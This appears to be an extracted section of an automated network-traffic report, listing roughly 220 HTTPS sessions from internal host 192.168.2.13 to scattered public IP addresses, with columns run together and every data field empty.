                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21659192.168.2.134251289.117.195.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21660192.168.2.13359429.237.246.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21661192.168.2.134496413.151.55.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21662192.168.2.1353304212.152.147.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21663192.168.2.133286670.179.29.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21664192.168.2.1343920203.225.201.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21665192.168.2.135023051.197.127.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21666192.168.2.1359546136.93.30.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21667192.168.2.1336388122.248.23.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21668192.168.2.1341666208.24.55.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21669192.168.2.133930690.30.108.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21670192.168.2.1332878132.116.202.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21671192.168.2.133988046.2.0.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21672192.168.2.1354902208.198.116.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21673192.168.2.1343276154.104.93.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21674192.168.2.1343738101.65.118.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21675192.168.2.133992231.41.193.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21676192.168.2.133727497.243.93.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21677192.168.2.134169440.94.79.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21678192.168.2.1354638128.64.202.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21679192.168.2.134480474.242.91.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21680192.168.2.133352441.145.88.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21681192.168.2.135847875.250.218.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21682192.168.2.1359726217.219.96.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21683192.168.2.1360038115.204.5.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21684192.168.2.1344346160.118.45.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21685192.168.2.134290441.139.180.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21686192.168.2.1344708201.242.197.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21687192.168.2.1352338170.143.102.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21688192.168.2.1352822123.104.239.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21689192.168.2.133678843.89.245.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21690192.168.2.1352876156.202.247.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21691192.168.2.1359028138.229.26.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21692192.168.2.1339268148.191.32.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21693192.168.2.13565768.158.55.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21694192.168.2.1339282171.149.10.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21695192.168.2.133687885.117.242.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21696192.168.2.134197896.62.7.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21697192.168.2.134749070.94.87.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21698192.168.2.1349312125.239.82.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21699192.168.2.1336968145.45.101.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21700192.168.2.1359998179.149.206.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21701192.168.2.1343360180.198.91.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21702192.168.2.1332928153.222.29.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21703192.168.2.1336704196.106.190.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21704192.168.2.1349400105.145.250.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21705192.168.2.1358844123.171.93.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21706192.168.2.1344048170.34.158.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21707192.168.2.1343968155.241.83.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21708192.168.2.135016245.34.245.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21709192.168.2.1343026112.82.19.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21710192.168.2.1357216154.117.166.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21711192.168.2.133930042.245.204.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21712192.168.2.1334066103.163.40.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21713192.168.2.1356690157.108.227.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21714192.168.2.1357390104.92.216.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21715192.168.2.133673441.157.40.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21716192.168.2.1345922211.214.140.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21717192.168.2.134010423.93.36.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21718192.168.2.135747849.116.165.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21719192.168.2.1335444131.58.30.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21720192.168.2.1353618195.249.47.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21721192.168.2.1344548134.26.65.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21722192.168.2.1337944212.62.228.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21723192.168.2.1352598106.7.174.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21724192.168.2.135529497.105.72.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21725192.168.2.13339222.178.244.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21726192.168.2.1357808208.134.71.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21727192.168.2.1333224173.54.135.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21728192.168.2.1341560123.79.128.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21729192.168.2.135957014.35.237.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21730192.168.2.134786854.155.246.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21731192.168.2.1340918182.215.166.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21732192.168.2.134739232.126.234.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21733192.168.2.1346182179.23.64.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21734192.168.2.134072483.12.6.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21735192.168.2.134574672.94.204.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21736192.168.2.1344430119.108.180.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21737192.168.2.133612275.83.13.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21738192.168.2.134825068.243.111.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21739192.168.2.1335866135.235.67.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21740192.168.2.1335354114.110.22.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21741192.168.2.1350504195.187.170.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21742192.168.2.1341254200.82.201.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21743192.168.2.133817079.131.34.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21744192.168.2.134466498.73.92.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21745192.168.2.133564869.84.239.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21746192.168.2.133823819.98.127.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21747192.168.2.1358366121.213.249.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21748192.168.2.133795460.76.99.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21749192.168.2.1360884193.175.102.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21750192.168.2.1343108115.13.52.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21751192.168.2.133459851.190.11.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21752192.168.2.133938062.100.10.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21753192.168.2.135331099.230.232.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21754192.168.2.135783083.10.213.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21755192.168.2.1343408153.49.93.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21756192.168.2.135247475.254.5.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21757192.168.2.1343056183.53.230.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21758192.168.2.1334404207.151.76.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21759192.168.2.135199245.161.104.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21760192.168.2.1341294205.126.134.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21761192.168.2.133409298.196.154.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21762192.168.2.1360794220.50.84.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21763192.168.2.1349498223.38.58.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21764192.168.2.1347036118.70.252.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21765192.168.2.1350176100.182.37.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21766192.168.2.1337486149.72.135.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21767192.168.2.1341634194.70.135.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21768192.168.2.133879479.24.127.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21769192.168.2.134647686.68.134.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21770192.168.2.135082661.73.192.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21771192.168.2.133551239.40.32.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21772192.168.2.1355316135.115.34.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21773192.168.2.133406849.237.166.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21774192.168.2.133307089.141.82.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21775192.168.2.1342538203.21.9.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21776192.168.2.1348848150.70.59.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21777192.168.2.1358758209.236.193.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21778192.168.2.1358102142.86.70.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21779192.168.2.1356780121.105.43.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21780192.168.2.1340174222.237.215.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21781192.168.2.135629431.252.27.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21782192.168.2.1350714152.170.45.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21783192.168.2.134800246.83.167.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21784192.168.2.1334340193.204.189.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21785192.168.2.135806246.219.131.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21786192.168.2.1349610203.17.159.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21787192.168.2.134868071.187.17.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21788192.168.2.134263083.118.194.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21789192.168.2.1348336105.55.45.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21790192.168.2.133555063.23.117.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21791192.168.2.1341242189.88.208.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21792192.168.2.1348488172.183.193.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21793192.168.2.135101465.73.236.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21794192.168.2.1350656176.241.77.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21795192.168.2.1339110169.208.162.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21796192.168.2.1355168194.146.208.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21797192.168.2.134663264.155.1.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21798192.168.2.1359746109.127.106.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21799192.168.2.1343890112.1.140.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21800192.168.2.1340546205.215.9.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21801192.168.2.1347134209.76.30.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21802192.168.2.1347028134.146.147.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21803192.168.2.1345804203.102.100.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21804192.168.2.136043051.144.102.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21805192.168.2.133754295.134.35.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21806192.168.2.135715687.249.160.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21807192.168.2.1360000160.167.195.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21808192.168.2.1342998180.94.206.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21809192.168.2.135427666.123.83.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21810192.168.2.135066841.48.192.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21811192.168.2.1334122186.120.70.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21812192.168.2.1359786220.231.241.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21813192.168.2.1354054159.239.203.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21814192.168.2.1345348218.158.18.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21815192.168.2.1355850164.8.14.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21816192.168.2.1350162159.150.167.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21817192.168.2.134044689.123.214.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21818192.168.2.134185044.121.44.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21819192.168.2.135509262.93.129.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21820192.168.2.134516893.232.151.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21821192.168.2.135584496.117.106.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21822192.168.2.136090619.31.19.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21823192.168.2.1334014162.104.176.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21824192.168.2.1359920217.250.18.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21825192.168.2.134790051.107.140.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21826192.168.2.1342148147.105.214.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21827192.168.2.1357854204.206.161.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21828192.168.2.1347454152.135.35.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21829192.168.2.1349978181.192.15.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21830192.168.2.13383184.95.117.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21831192.168.2.134077892.148.190.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21832192.168.2.1342718171.81.6.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21833192.168.2.1337772210.197.119.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21834192.168.2.134549813.58.211.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21835192.168.2.1348280102.86.160.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21836192.168.2.1354662143.4.166.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21837192.168.2.133548484.71.5.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21838192.168.2.1335364187.166.185.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21839192.168.2.133429444.12.76.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21840192.168.2.136052873.4.41.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21841192.168.2.1356466140.27.228.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21842192.168.2.135396260.179.252.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21843192.168.2.1340668134.36.113.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21844192.168.2.1359700150.192.87.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21845192.168.2.1344628143.250.173.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21846192.168.2.1349444176.180.181.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21847192.168.2.134160671.229.137.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21848192.168.2.1359698180.42.224.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21849192.168.2.1336448170.22.33.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21850192.168.2.133386043.50.150.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21851192.168.2.13494805.109.210.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21852192.168.2.134533497.138.231.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21853192.168.2.1356608188.83.70.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21854192.168.2.1336048160.13.237.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21855192.168.2.1350522153.118.195.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21856192.168.2.134065887.91.170.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21857192.168.2.134977074.91.186.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21858192.168.2.1333990209.143.49.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21859192.168.2.1338800106.200.104.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21860192.168.2.135151475.123.9.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21861192.168.2.135737427.214.45.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21862192.168.2.1352578205.187.141.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21863192.168.2.1349682213.12.18.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21864192.168.2.1335350211.179.223.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21865192.168.2.134423067.205.22.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21866192.168.2.1340434220.60.226.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21867192.168.2.1354106108.244.70.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21868192.168.2.1339160118.23.55.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21869192.168.2.1333648103.39.24.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21870192.168.2.1345216146.148.185.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21871192.168.2.1339140221.169.9.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21872192.168.2.1360072105.241.44.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21873192.168.2.1360604195.240.156.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21874192.168.2.133692238.238.133.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21875192.168.2.135115294.229.143.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21876192.168.2.1347590168.52.142.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21877192.168.2.1354078201.116.98.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21878192.168.2.135903046.97.190.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21879192.168.2.135473098.28.83.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    21880192.168.2.1360452171.243.102.103443
